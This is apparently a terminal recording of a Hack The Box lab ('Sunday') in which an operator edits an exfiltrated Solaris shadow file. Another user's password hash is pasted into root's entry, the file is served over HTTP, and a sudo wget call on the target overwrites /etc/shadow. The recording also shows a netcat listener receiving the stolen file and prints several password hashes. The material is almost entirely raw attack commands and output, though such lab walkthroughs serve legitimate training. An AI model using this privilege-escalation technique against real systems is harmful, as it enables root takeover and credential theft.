[47.546359, "o", "\u001b[?25l\u001b[7m\u001b[51;1H  GNU nano 6.1                                                                                                       shadow *                                                                                                          \u001b(B\u001b[m\u001b[30m\u001b[43m[0/0]\u001b[39m\u001b[49m\u001b[52;1Hroot::18969::::::263424\u001b[36X\u001b[36C \u001b[58X\u001b[58C \u001b[K\r\ndaemon:NP:6445::::::\u001b[K\r\nbin:NP:6445::::::\u001b[K\r\nsys:NP:6445::::::\u001b[K\r\nadm:NP:6445::::::\u001b[K\r\ndladm:*LK*:17760::::::\u001b[K\r\nnetadm:*LK*:17760::::::\u001b[K\r\nnetcfg:*LK*:17760::::::\u001b[K\r\ndhcpserv:*LK*:17760::::::\u001b[K\r\nftp:*LK*:17760::::::\u001b[K\r\nsshd:*LK*:17760::::::\u001b[K\r\nsmmsp:NP:17760::::::\u001b[K\r\naiuser:*LK*:17760::::::\u001b[K\r\nikeuser:*LK*:17760::::::\u001b[K\r\nlp:NP:6445::::::\u001b[K\r\nopenldap:NP:17760::::::\u001b[K\r\nwebservd:*LK*:17760::::::\u001b[K\r\nunknown:*LK*:17760::::::\u001b[K\r\npkg5srv:NP:17760::::::\u001b[K\r\nnobody:*LK*:17760::::::\u001b[K\r\nnoaccess:*LK*:6445::::::\u001b[K\r\nnobody4:*LK*:6445::::::\u001b[K\r\nsammy:$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi0ZQK3XIDqT2:18980::::::\u001b[K\r\nsunny:$5$rounds=10000$bioFdRBN$1TTdfQFfh"]
[47.54657, "o", "jNicxWhH07f8BIHABZ8di01CXWYTT5rMn9:18980::::::2661408\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[7m\r\n^G\u001b(B\u001b[m Help\u001b[11X\u001b[7m\u001b[11C^O\u001b(B\u001b[m Write Out\u001b[6X\u001b[7m\u001b[6C^W\u001b(B\u001b[m Where Is\u001b[7X\u001b[7m\u001b[7C^K\u001b(B\u001b[m Cut\u001b[12X\u001b[7m\u001b[12C^T\u001b(B\u001b[m Execute\u001b[8X\u001b[7m\u001b[8C^C\u001b(B\u001b[m Location\u001b[7X\u001b[7m\u001b[7CM-U\u001b(B\u001b[m Undo\u001b[2X\u001b[2C \u001b[7X\u001b[7m\u001b[7CM-A\u001b(B\u001b[m Set Mark\u001b[6X\u001b[7m\u001b[6CM-]\u001b(B\u001b[m To Bracket    \u001b[7mM-Q\u001b(B\u001b[m Previous\u001b[6X\u001b[7m\u001b[6C^B\u001b(B\u001b[m Back\u001b[11X\u001b[7m\u001b[11C^◂\u001b(B\u001b[m Prev Word\u001b[6X\u001b[7m\u001b[6C^A\u001b(B\u001b[m Home\u001b[K\u001b[7m\r\n^X\u001b(B\u001b[m Exit\u001b[11X\u001b[7m\u001b[11C^R\u001b(B\u001b[m Read File\u001b[6X\u001b[7m\u001b[6C^\\\u001b(B\u001b[m Replace\u001b[8X\u001b[7m\u001b[8C^U\u001b(B\u001b[m Paste\u001b[10X\u001b[7m\u001b[10C^J\u001b(B\u001b[m Justify\u001b[8X\u001b[7m\u001b[8C^/\u001b(B\u001b[m Go To Line     \u001b[7mM-E\u001b(B\u001b[m Redo\u001b[2X\u001b[2C \u001b[7X\u001b[7m\u001b[7CM-6\u001b(B\u001b[m Copy\u001b[10X\u001b[7m\u001b[10C^Q\u001b(B\u001b[m Where Was\u001b[6X\u001b[7m\u001b[6CM-W\u001b(B\u001b[m Next\u001b[10X\u001b[7m\u001b[10C^F\u001b(B\u001b[m Forward\u001b[8X\u001b[7m\u001b[8C^▸\u001b(B\u001b[m Next Word\u001b[6X\u001b[7m\u001b[6C^E\u001b(B\u001b[m End\u001b[K\u001b[50;1H───────────────────────────────────"]
[47.546697, "o", "────────────────────────────────────────────────────────────────────────────────────\u001b[33m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[74;7H\u001b[?2004l"]
[47.546981, "o", "\u001b[?25l\u001b[50;1H───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[33m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[shadow] \u001b[4m0:[tmux]*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                     20:20\u001b(B\u001b[m\u001b[?12l\u001b[?25h"]
[47.547002, "o", "\u001b[74;7H"]
[48.764057, "o", "\u001b[52;60H \u001b[58C \u001b[74;7H\u001b[30m\u001b[43m$\u001b[98;119H\u001b[39m\u001b[49m \u001b[80C\u001b[7m◂\u001b[99;119H\u001b(B\u001b[m \u001b[80C\u001b[7m▸\u001b[74;7H\u001b(B\u001b[m"]
[48.870047, "o", "\u001b[30m\u001b[43m$5\b\u001b(B\u001b[m"]
[49.369785, "o", "\b\u001b[30m\u001b[43m$5$\b\u001b(B\u001b[m"]
[49.420083, "o", "\b\b\u001b[30m\u001b[43m$5$r\b\u001b(B\u001b[m"]
[49.47122, "o", "\u001b[3D\u001b[30m\u001b[43m$5$ro\b\u001b(B\u001b[m"]
[49.521875, "o", "\u001b[4D\u001b[30m\u001b[43m$5$rou\b\u001b(B\u001b[m"]
[49.571903, "o", "\u001b[5D\u001b[30m\u001b[43m$5$roun\b\u001b(B\u001b[m"]
[49.622998, "o", "\u001b[6D\u001b[30m\u001b[43m$5$round\b\u001b(B\u001b[m"]
[49.673972, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds\b\u001b(B\u001b[m"]
[49.724526, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=\b\u001b(B\u001b[m"]
[49.775327, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=1\b\u001b(B\u001b[m"]
[49.825848, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10\b\u001b(B\u001b[m"]
[49.875429, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=100\b\u001b(B\u001b[m"]
[49.925967, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=1000\b\u001b(B\u001b[m"]
[49.977097, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000\b\u001b(B\u001b[m"]
[50.027833, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$\b\u001b(B\u001b[m"]
[50.078015, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$l\b\u001b(B\u001b[m"]
[50.128476, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lU\b\u001b(B\u001b[m"]
[50.178882, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUp\b\u001b(B\u001b[m"]
[50.229552, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW\b\u001b(B\u001b[m"]
[50.279661, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4\b\u001b(B\u001b[m"]
[50.330643, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4p\b\u001b(B\u001b[m"]
[50.380748, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4pr\b\u001b(B\u001b[m"]
[50.431952, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM\b\u001b(B\u001b[m"]
[50.483212, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$\b\u001b(B\u001b[m"]
[50.534052, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$a\b\u001b(B\u001b[m"]
[50.586691, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aK\b\u001b(B\u001b[m"]
[50.63707, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKF\b\u001b(B\u001b[m"]
[50.688006, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJ\b\u001b(B\u001b[m"]
[50.738236, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJx\b\u001b(B\u001b[m"]
[50.790007, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxj\b\u001b(B\u001b[m"]
[50.840554, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI\b\u001b(B\u001b[m"]
[50.890041, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7\b\u001b(B\u001b[m"]
[50.940484, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7v\b\u001b(B\u001b[m"]
[50.99066, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vl\b\u001b(B\u001b[m"]
[51.040825, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlc\b\u001b(B\u001b[m"]
[51.09146, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj\b\u001b(B\u001b[m"]
[51.143099, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5\b\u001b(B\u001b[m"]
[51.19321, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5D\b\u001b(B\u001b[m"]
[51.24498, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DD\b\u001b(B\u001b[m"]
[51.29597, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDv\b\u001b(B\u001b[m"]
[51.346295, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvw\b\u001b(B\u001b[m"]
[51.396769, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwI\b\u001b(B\u001b[m"]
[51.447388, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIg\b\u001b(B\u001b[m"]
[51.497846, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgY\b\u001b(B\u001b[m"]
[51.548435, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYG\b\u001b(B\u001b[m"]
[51.599517, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy\b\u001b(B\u001b[m"]
[51.649857, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy7\b\u001b(B\u001b[m"]
[51.701464, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy70\b\u001b(B\u001b[m"]
[51.752588, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707\b\u001b(B\u001b[m"]
[51.803561, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a\b\u001b(B\u001b[m"]
[51.853492, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a8\b\u001b(B\u001b[m"]
[51.903563, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84\b\u001b(B\u001b[m"]
[51.954625, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84m\b\u001b(B\u001b[m"]
[52.004839, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mI\b\u001b(B\u001b[m"]
[52.056113, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIE\b\u001b(B\u001b[m"]
[52.107121, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi\b\u001b(B\u001b[m"]
[52.158533, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi0\b\u001b(B\u001b[m"]
[52.2091, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi0Z\b\u001b(B\u001b[m"]
[52.259301, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi0ZQ\b\u001b(B\u001b[m"]
[52.310672, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi0ZQK\b\u001b(B\u001b[m"]
[52.360352, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi0ZQK3\b\u001b(B\u001b[m"]
[52.41097, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi0ZQK3X\b\u001b(B\u001b[m"]
[52.461594, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi0ZQK3XI\b\u001b(B\u001b[m"]
[52.512963, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi0ZQK3XID\b\u001b(B\u001b[m"]
[52.56393, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi0ZQK3XIDq\b\u001b(B\u001b[m"]
[52.614824, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi0ZQK3XIDqT\b\u001b(B\u001b[m"]
[52.665854, "o", "\u001b[7G\u001b[30m\u001b[43m$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi0ZQK3XIDqT2\b\u001b(B\u001b[m"]
[53.577952, "o", "\u001b]52;;JDUkcm91bmRzPTEwMDAwJGxVcFc0cHJNJGFLRkp4akk3dmxjajVERHZ3SWdZR3k3MDdhODRtSUVpMFpRSzNYSURxVDI=\u0007\u001b[7G\u001b[?2004h\u001b[?25l\u001b[7m\u001b[51;1H  GNU nano 6.1                                                                                                       shadow *                                                                                                               \u001b(B\u001b[m\u001b[52;1Hroot::18969::::::263424\u001b[K\r\ndaemon:NP:6445::::::\u001b[K\r\nbin:NP:6445::::::\u001b[K\r\nsys:NP:6445::::::\u001b[K\r\nadm:NP:6445::::::\u001b[K\r\ndladm:*LK*:17760::::::\u001b[K\r\nnetadm:*LK*:17760::::::\u001b[K\r\nnetcfg:*LK*:17760::::::\u001b[K\r\ndhcpserv:*LK*:17760::::::\u001b[K\r\nftp:*LK*:17760::::::\u001b[K\r\nsshd:*LK*:17760::::::\u001b[K\r\nsmmsp:NP:17760::::::\u001b[K\r\naiuser:*LK*:17760::::::\u001b[K\r\nikeuser:*LK*:17760::::::\u001b[K\r\nlp:NP:6445::::::\u001b[K\r\nopenldap:NP:17760::::::\u001b[K\r\nwebservd:*LK*:17760::::::\u001b[K\r\nunknown:*LK*:17760::::::\u001b[K\r\npkg5srv:NP:17760::::::\u001b[K\r\nnobody:*LK*:17760::::::\u001b[K\r\nnoaccess:*LK*:6445::::::\u001b[K\r\nnobody4:*LK*:6445::::::\u001b[K\r\nsammy:$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIE"]
[53.57799, "o", "i0ZQK3XIDqT2:18980::::::\u001b[K\r\nsunny:$5$rounds=10000$bioFdRBN$1TTdfQFfhjNicxWhH07f8BIHABZ8di01CXWYTT5rMn9:18980::::::2661408\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[7m\r\n^G\u001b(B\u001b[m Help\u001b[11X\u001b[7m\u001b[11C^O\u001b(B\u001b[m Write Out\u001b[6X\u001b[7m\u001b[6C^W\u001b(B\u001b[m Where Is\u001b[7X\u001b[7m\u001b[7C^K\u001b(B\u001b[m Cut\u001b[12X\u001b[7m\u001b[12C^T\u001b(B\u001b[m Execute\u001b[8X\u001b[7m\u001b[8C^C\u001b(B\u001b[m Location\u001b[7X\u001b[7m\u001b[7CM-U\u001b(B\u001b[m Undo\u001b[10X\u001b[7m\u001b[10CM-A\u001b(B\u001b[m Set Mark\u001b[6X\u001b[7m\u001b[6CM-]\u001b(B\u001b[m To Bracket    \u001b[7mM-Q\u001b(B\u001b[m Previous\u001b[6X\u001b[7m\u001b[6C^B\u001b(B\u001b[m Back\u001b[11X\u001b[7m\u001b[11C^◂\u001b(B\u001b[m Prev Word\u001b[6X\u001b[7m\u001b[6C^A\u001b(B\u001b[m Home\u001b[K\u001b[7m\r\n^X\u001b(B\u001b[m Exit\u001b[11X\u001b[7m\u001b[11C^R\u001b(B\u001b[m Read File\u001b[6X\u001b[7m\u001b[6C^\\\u001b(B\u001b[m Replace\u001b[8X\u001b[7m\u001b[8C^U\u001b(B\u001b[m Paste\u001b[10X\u001b[7m\u001b[10C^J\u001b(B\u001b[m Justify\u001b[8X\u001b[7m\u001b[8C^/\u001b(B\u001b[m Go To Line     \u001b[7mM-E\u001b(B\u001b[m Redo\u001b[10X\u001b[7m\u001b[10CM-6\u001b(B\u001b[m Copy\u001b[10X\u001b[7m\u001b[10C^Q\u001b(B\u001b[m Where Was\u001b[6X\u001b[7m\u001b[6CM-W\u001b(B\u001b[m Next\u001b[10X\u001b[7m\u001b[10C^F\u001b(B\u001b[m Forward\u001b[8X\u001b[7m\u001b[8C^▸\u001b(B\u001b[m Next Word\u001b[6X\u001b[7m\u001b[6C^E\u001b(B\u001b[m End\u001b[K\u001b[50;1H─────────────────"]
[53.578002, "o", "──────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[shadow] \u001b[4m0:nano*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                       20:20\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[74;7H"]
[54.044578, "o", "\u001b[A"]
[54.544814, "o", "\u001b[A"]
[54.594362, "o", "\u001b[A"]
[54.644913, "o", "\u001b[A"]
[54.695212, "o", "\u001b[A"]
[54.746168, "o", "\u001b[A"]
[54.796538, "o", "\u001b[A"]
[54.847251, "o", "\u001b[?25l"]
[54.84731, "o", "\u001b[A\u001b[?12l\u001b[?25h"]
[54.897981, "o", "\u001b[A"]
[54.948158, "o", "\u001b[A"]
[54.998903, "o", "\u001b[A"]
[55.048332, "o", "\u001b[A"]
[55.098982, "o", "\u001b[A"]
[55.150182, "o", "\u001b[A"]
[55.202386, "o", "\u001b[A"]
[55.252264, "o", "\u001b[A"]
[55.301887, "o", "\u001b[?25l"]
[55.302231, "o", "\u001b[A\u001b[?12l\u001b[?25h"]
[55.352194, "o", "\u001b[?25l\u001b[?12l\u001b[?25h\u001b[A"]
[55.40336, "o", "\u001b[A"]
[55.454772, "o", "\u001b[A"]
[55.50467, "o", "\u001b[A"]
[55.555433, "o", "\u001b[A"]
[56.05461, "o", "\b"]
[60.06642, "o", "\u001b[?25l"]
[60.067209, "o", "$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi0ZQK3XIDqT2:18969::::::263424\u001b[18D\u001b[?12l\u001b[?25h"]
[64.642545, "o", "\u001b[97;1H\u001b[7mSave modified buffer?                                                                                                                                                                                                                       \u001b[98;1H Y\u001b(B\u001b[m Yes\u001b[K\r\n\u001b[7m N\u001b(B\u001b[m No  \u001b[9C\u001b[7m^C\u001b(B\u001b[m Cancel\u001b[K\u001b[97;23H"]
[65.071218, "o", "\u001b[?25l"]
[65.07145, "o", "\r\u001b[7mFile Name to Write [DOS Format]: shadow\r\n^G\u001b(B\u001b[m Help\u001b[52C\u001b[7mM-D\u001b(B\u001b[m DOS Format\u001b[45C\u001b[7mM-A\u001b(B\u001b[m Append\u001b[49C\u001b[7mM-B\u001b(B\u001b[m Backup File\r\n\u001b[7m^C\u001b(B\u001b[m Cancel\u001b[7C         \u001b[34C\u001b[7mM-M\u001b(B\u001b[m Mac Format\u001b[45C\u001b[7mM-P\u001b(B\u001b[m Prepend\u001b[48C\u001b[7m^T\u001b(B\u001b[m Browse\u001b[97;40H\u001b[?12l\u001b[?25h"]
[65.331452, "o", "\u001b[?25l\u001b[70C\u001b[1K\u001b[C \u001b[7m[ Writing... ]\u001b(B\u001b[m\u001b[K"]
[65.332168, "o", "\u001b[51;125H\u001b[7m \u001b[97;110H[ Wrote 24 lines ]\u001b(B\u001b[m"]
[65.332578, "o", "\u001b[51;99r\u001b[98;1H\u001b[K\r\n\u001b[K\u001b[2A\u001b[K\u001b[1;100r\u001b[62;1H\u001b[?12l\u001b[?25h\u001b[?2004l"]
[65.332736, "o", "\u001b[?25l\u001b[94m\u001b[11A┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m nc -nvlp 4444 > shadow_og\u001b[K\r\nNcat: Version 7.92 ( https://nmap.org/ncat )\u001b[K\r\nNcat: Listening on :::4444\u001b[K\r\nNcat: Listening on 0.0.0.0:4444\u001b[K\r\nNcat: Connection from 10.10.10.76.\u001b[K\r\nNcat: Connection from 10.10.10.76:40207.\u001b[K\u001b[94m\r\n┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m cp shadow_og shadow\u001b[K\u001b[94m\r\n┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m nano shadow\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[37A"]
[65.333038, "o", "\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[?2004h"]
[65.694129, "o", "\u001b[?25l\u001b[50;1H───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[shadow] \u001b[4m0:bash*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                       20:20\u001b(B\u001b[m\u001b[?12l\u001b[?25h"]
[65.694192, "o", "\u001b[63;5H"]
[65.694339, "o", "c"]
[65.777861, "o", "a"]
[65.995927, "o", "t"]
[66.070921, "o", " "]
[66.193485, "o", "s"]
[66.323677, "o", "h"]
[66.567213, "o", "a"]
[67.081218, "o", "d"]
[67.163267, "o", "o"]
[67.249318, "o", "w"]
[67.327836, "o", "\r\n\u001b[?2004l"]
[67.328667, "o", "root:$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi0ZQK3XIDqT2:18969::::::263424\r\ndaemon:NP:6445::::::\r\nbin:NP:6445::::::\r\nsys:NP:6445::::::\r\nadm:NP:6445::::::\r\ndladm:*LK*:17760::::::\r\nnetadm:*LK*:17760::::::\r\nnetcfg:*LK*:17760::::::\r\ndhcpserv:*LK*:17760::::::\r\nftp:*LK*:17760::::::\r\nsshd:*LK*:17760::::::\r\nsmmsp:NP:17760::::::\r\naiuser:*LK*:17760::::::\r\nikeuser:*LK*:17760::::::\r\nlp:NP:6445::::::\r\nopenldap:NP:17760::::::\r\nwebservd:*LK*:17760::::::\r\nunknown:*LK*:17760::::::\r\npkg5srv:NP:17760::::::\r\nnobody:*LK*:17760::::::\r\nnoaccess:*LK*:6445::::::\r\nnobody4:*LK*:6445::::::\r\nsammy:$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi0ZQK3XIDqT2:18980::::::\r\nsunny:$5$rounds=10000$bioFdRBN$1TTdfQFfhjNicxWhH07f8BIHABZ8di01CXWYTT5rMn9:18980::::::2661408\r\n"]
[67.328905, "o", "\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[?2004h"]
[69.696478, "o", "p"]
[69.914679, "o", "y"]
[70.035476, "o", "t"]
[70.123363, "o", "h"]
[70.193164, "o", "o"]
[70.321129, "o", "n"]
[70.377081, "o", "3"]
[70.471786, "o", " "]
[70.581669, "o", "-"]
[70.706047, "o", "m"]
[70.941506, "o", " "]
[71.479313, "o", "h"]
[71.599756, "o", "t"]
[71.745592, "o", "t"]
[71.834571, "o", "p"]
[72.023018, "o", "."]
[72.100331, "o", "s"]
[72.1678, "o", "e"]
[72.366273, "o", "r"]
[72.516646, "o", "v"]
[72.643909, "o", "e"]
[72.695148, "o", "r"]
[73.173113, "o", " "]
[73.350225, "o", "8"]
[73.411769, "o", "0"]
[73.731801, "o", "\r\n\u001b[?2004l"]
[73.794913, "o", "Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...\r\n"]
[77.021584, "o", "\u001b[?25l\u001b[41A\u001b[32m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[shadow] \u001b[4m0:python3*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                    20:21\u001b(B\u001b[m\u001b[?12l\u001b[?"]
[77.021999, "o", "25h\u001b[13;12H"]
[77.022718, "o", "\u001b[?25l\u001b[50;1H\u001b[32m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[shadow] \u001b[4m0:sshpass*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                    20:21\u001b(B\u001b[m\u001b[?12l\u001b"]
[77.022918, "o", "[?25h\u001b[13;12H"]
[78.998092, "o", "sudo /usr/bin/wget http://10.10.14.31/shadow -O /etc/shadow"]
[80.762666, "o", "\r\n"]
[80.784804, "o", "--2022-09-03 12:21:18--  http://10.10.14.31/shadow\r\n"]
[80.785228, "o", "Connecting to 10.10.14.31:80... "]
[80.826937, "o", "connected.\r\n"]
[80.827263, "o", "HTTP request sent, awaiting response... "]
